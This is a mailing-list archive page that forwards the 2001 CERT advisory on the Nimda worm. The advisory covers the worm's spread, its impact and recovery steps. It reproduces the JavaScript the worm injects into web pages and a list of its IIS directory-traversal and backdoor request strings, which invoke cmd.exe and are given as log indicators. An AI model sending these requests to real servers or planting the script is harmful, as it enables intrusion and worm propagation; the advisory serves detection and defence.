[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[cobalt-users] Fw: CERT Advisory CA-2001-26 Nimda Worm
- Subject: [cobalt-users] Fw: CERT Advisory CA-2001-26 Nimda Worm
- From: "Gerald Waugh" <gerald@xxxxxxxxx>
- Date: Tue Sep 18 15:27:39 2001
- List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>
>
> -----BEGIN PGP SIGNED MESSAGE-----
>
> CERT Advisory CA-2001-26 Nimda Worm
>
> Original release date: September 18, 2001
> Source: CERT/CC
>
> A complete revision history is at the end of this file.
>
> Systems Affected
>
> * Systems running Microsoft Windows 95, 98, ME, NT, and 2000
>
> Overview
>
> The CERT/CC has received reports of new malicious code known as the
> "W32/Nimda worm" or the "Concept Virus (CV) v.5." This new worm
> appears to spread by multiple mechanisms:
>
> * from client to client via email
>
> * from client to client via open network shares
>
> * from web server to client via browsing of compromised web sites
>
> * from client to web server via active scanning for and exploitation
> of the "Microsoft IIS 4.0 / 5.0 directory traversal" vulnerability
> (VU #111677)
>
> * from client to web server via scanning for the back doors left
> behind by the "Code Red II" (IN-2001-09), and "sadmind/IIS"
> (CA-2001-11) worms
>
> Initial analysis indicates that the worm contains no destructive
> payload beyond modification of web content to facilitate its own
> propagation.
>
> We are also receiving reports of denial of service as a result of
> network scanning and email propagation.
>
> I. Description
>
> The Nimda worm has the potential to affect both user workstations
> (clients) running Windows 95, 98, ME, NT, or 2000 and servers running
> Windows NT and 2000.
>
> Email Propagation
>
> This worm propagates through email arriving as a MIME
> "multipart/alternative" message consisting of two sections. The first
> section is defined as MIME type "text/html", but it contains no text,
> so the email appears to have no content. The second section is defined
> as MIME type "audio/x-wav", but it contains a base64-encoded
> attachment named "readme.exe", which is a binary executable.
>
> Due to a vulnerability described in CA-2001-06 (Automatic Execution of
> Embedded MIME Types), any mail software running on an x86 platform
> that uses Microsoft Internet Explorer 5.5 SP1 or earlier (except IE
> 5.01 SP2) to render the HTML mail automatically runs the enclosed
> attachment and, as result, infects the machine with the worm. Thus, in
> vulnerable configurations, the worm payload will automatically be
> triggered by simply opening (or previewing) this mail message. As an
> executable binary, the payload can also be triggered by simply running
> the attachment.
>
> The email message delivering the Nimda worm appears to also have the
> following characteristics:
>
> * The text in the subject line of the mail message appears to be
> variable, but those seen to date have been over 80 characters
> long.
>
> * There appear to be many slight variations in the attach binary
> file, causing the MD5 checksum to be different when one compares
> different attachments from different email messages. However, the
> file length of the attachment appears to consistently be 57344
> bytes.
>
> Payload
>
> Infected client machines attempt to send copies of the Nimda worm via
> email to all addresses found in the Windows address book.
>
> Likewise, the client machines begin scanning for vulnerable IIS
> servers. Nimda looks for backdoors left by previous IIS worms: Code
> Red II [IN-2001-09] and sadmind/IIS worm [CA-2001-11]. It also
> attempts to exploit the IIS Directory Traversal vulnerability (VU
> #111677). The selection of potential target IP addresses follows these
> rough probabilities:
>
> * 50% of the time, an address with the same first two octets will be
> chosen
>
> * 25% of the time, an address with the same first octet will be
> chosen
>
> * 25% of the time, a random address will be chosen
>
> The infected client machine transfers a copy of the Nimda code to any
> server that it scans and finds to be vulnerable. Once running on the
> server machine, the worm traverses each directory in the system
> (including all those accessible through a file shares) and write a
> copy of itself to disk using the name "README.EML". When a directory
> containing web content (e.g., HTML or ASP files) is found, the
> following snippet of Javascript code is appended to every one of these
> web-related files:
>
> <script language="JavaScript">
> window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
> </script>
>
> This modification of web content allows further propagation of the
> worm to new clients through a browser or browsing of a network file
> system.
>
> Browser Propagation
>
> As part of the infection process, the Nimda worm modifies all web
> content files it finds (including, but not limited to, files with
> .htm, .html, and .asp extensions). As a result, any user browsing web
> content on the system, whether via the file system or via a web
> server, may download a copy of the worm. Some browsers may
> automatically execute the downloaded copy, thereby infecting the
> browsing system.
>
> File System Propagation
>
> The Nimda worm creates numerous copies of itself (using the name
> README.EML) in all writable directories (including those found on a
> network share) to which the user has access. If a user on another
> system subsequently selects the copy of the worm file on the shared
> network drive in Windows Explorer with the preview option enabled, the
> worm may be able to compromise that system.
>
> System FootPrint
>
> The scanning activity of the Nimda worm produces the following log
> entries for any web server listing on port 80/tcp:
>
> GET /scripts/root.exe?/c+dir
> GET /MSADC/root.exe?/c+dir
> GET /c/winnt/system32/cmd.exe?/c+dir
> GET /d/winnt/system32/cmd.exe?/c+dir
> GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
> GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
> GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
> GET
/msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system
32/cmd.exe?/c+dir
> GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
> GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
> GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
> GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
> GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
> GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
> GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
> GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir
>
> Note: The first four entries in these sample logs denote attempts to
> connect to the backdoor left by Code Red II, while the remaining log
> entries are examples of exploit attempts for the Directory Traversal
> vulnerability.
>
> II. Impact
>
> Intruders can execute arbitrary commands within the LocalSystem
> security context on machines running the unpatched versions of IIS.
> Host that have been compromised are also at high risk for being party
> to attacks on other Internet sites.
>
> The high scanning rate of the Nimda worm may also cause bandwidth
> denial-of-service conditions on networks with infected machines.
>
> III. Solutions
>
> Recommendations for System Administrators of IIS machines
>
> To determine if your system has been compromised, look for the
> following:
>
> * root.exe artifact (indicates a compromise by Code Red II or
> sadmind/IIS worms making the system vulnerable to the Nimda worm)
>
> * admin.dll artifact or unexpected .eml files in the directories
> with web content (indicates compromise by the Nimda worm)
>
> The only safe way to recover from the system compromise is to format
> the system drive(s) and reinstall the system software from trusted
> media (such as vendor-supplied CD-ROM). Additionally, after the
> software is reinstalled, all vendor-supplied security patches must be
> applied. The recommended time to do this is while the system is not
> connected to any network. However, if sufficient care is taken to
> disable all server network services, then the patches can be
> downloaded from the Internet.
>
> Detailed instructions for recovering your system can be found in the
> CERT/CC tech tip:
>
> Steps for Recovering from a UNIX or NT System Compromise
> http://www.cert.org/tech_tips/win-UNIX-system_compromise.html
>
> Apply the appropriate patch from your vendor
>
> A cumulative patch which addresses all of the IIS-related
> vulnerabilities exploited by the Nimda worm is available from
> Microsoft at
>
> http://www.microsoft.com/technet/security/bulletin/MS01-044.asp
>
> Recommendations for End User Systems
>
> Apply the appropriate patch from your vendor
>
> If you are running a vulnerable version of Internet Explorer (IE), the
> CERT/CC recommends applying patch for the "Automatic Execution of
> Embedded MIME Types" vulnerability available from Microsoft at
>
> http://www.microsoft.com/technet/security/bulletin/MS01-020.asp
>
> Run and Maintain an Anti-Virus Product
>
> It is important for users to update their anti-virus software. Most
> anti-virus software vendors have released updated information, tools,
> or virus databases to help detect and partially recover from this
> malicious code. A list of vendor-specific anti-virus information can
> be found in Appendix A.
>
> Many anti-virus packages support automatic updates of virus
> definitions. We recommend using these automatic updates when
> available.
>
> Don't open e-mail attachments
>
> The Nimda worm may arrive as an email attachment named "readme.exe".
> Users should not open this attachment.
>
> Disable JavaScript End-user systems can become infected with the
> Nimda worm by browsing web sites hosted by infected servers. This
> method of infection requires the use of JavaScript to be successful.
> Therefore, the CERT/CC recommends that end user systems disable
> JavaScript.
>
> Appendix A. Vendor Information
>
> Antivirus Vendor Information
>
> Central Command, Inc.
>
> http://support.centralcommand.com/cgi-bin/command.cfg/php/endus
> er/std_adp.php?p_refno=010918-000005
>
> Command Software Systems
>
> http://www.commandsoftware.com/virus/nimda.html
>
> Data Fellows Corp
>
> http://www.datafellows.com/v-descs/nimda.shtml
>
> McAfee
>
> http://vil.mcafee.com/dispVirus.asp?virus_k=99209&;
>
> Sophos
>
> http://www.sophos.com/virusinfo/analyses/w32nimdaa.html
>
> Symantec
>
> http://www.symantec.com/avcenter/venc/data/w32.nimda.a@xxxxxxx
>
> Trend Micro
>
> http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=
> TROJ_NIMDA.A
>
> http://www.antivirus.com/pc-cillin/vinfo/virusencyclo/default5.
> asp?VName=TROJ_NIMDA.A
>
> You may wish to visit the CERT/CC's computer virus resources page
> located at
>
> http://www.cert.org/other_sources/viruses.html
>
> References
>
> Authors: Roman Danyliw, Chad Dougherty, Allen Householder, Robin
> Ruefle
> ______________________________________________________________________
>
> This document is available from:
> http://www.cert.org/body/advisories/CA200126_FA200126.html
> ______________________________________________________________________
>
> CERT/CC Contact Information
>
> Email: cert@xxxxxxxx
> Phone: +1 412-268-7090 (24-hour hotline)
> Fax: +1 412-268-6989
> Postal address:
> CERT Coordination Center
> Software Engineering Institute
> Carnegie Mellon University
> Pittsburgh PA 15213-3890
> U.S.A.
>
> CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4)
> Monday through Friday; they are on call for emergencies during other
> hours, on U.S. holidays, and on weekends.
>
> Using encryption
>
> We strongly urge you to encrypt sensitive information sent by email.
> Our public PGP key is available from
>
> http://www.cert.org/CERT_PGP.key
>
> If you prefer to use DES, please call the CERT hotline for more
> information.
>
> Getting security information
>
> CERT publications and other security information are available from
> our web site
>
> http://www.cert.org/
>
> To be added to our mailing list for advisories and bulletins, send
> email to cert-advisory-request@xxxxxxxx and include SUBSCRIBE
> your-email-address in the subject of your message.
>
> * "CERT" and "CERT Coordination Center" are registered in the U.S.
> Patent and Trademark Office.
> ______________________________________________________________________
>
> NO WARRANTY
> Any material furnished by Carnegie Mellon University and the Software
> Engineering Institute is furnished on an "as is" basis. Carnegie
> Mellon University makes no warranties of any kind, either expressed or
> implied as to any matter including, but not limited to, warranty of
> fitness for a particular purpose or merchantability, exclusivity or
> results obtained from use of the material. Carnegie Mellon University
> does not make any warranty of any kind with respect to freedom from
> patent, trademark, or copyright infringement.
> _________________________________________________________________
>
> Conditions for use, disclaimers, and sponsorship information
>
> Copyright 2001 Carnegie Mellon University.
>
> Revision History
>
> September 18, 2001: Initial Release
>
>
>
>
>
>
> -----BEGIN PGP SIGNATURE-----
> Version: PGPfreeware 5.0i for non-commercial use
> Charset: noconv
>
> iQCVAwUBO6fYPgYcfu8gsZJZAQEG4QQAoblNKbAX/bVmJBdXy2Juf9OsMZeO2bR5
> UW6hi7ddDkdUNBe52du2wU+n34tSjzA3c+0g9tYwKSXFeOp+m/CCLeYEXR+VTTel
> RAmY1tOzDfMIDxD6+GrvfajYMz4pCGoSJgIdPGKxJm0Tnf6iv4akaYSAB4BPRw7A
> FVp6JcCbatg=
> =FizN
> -----END PGP SIGNATURE-----
>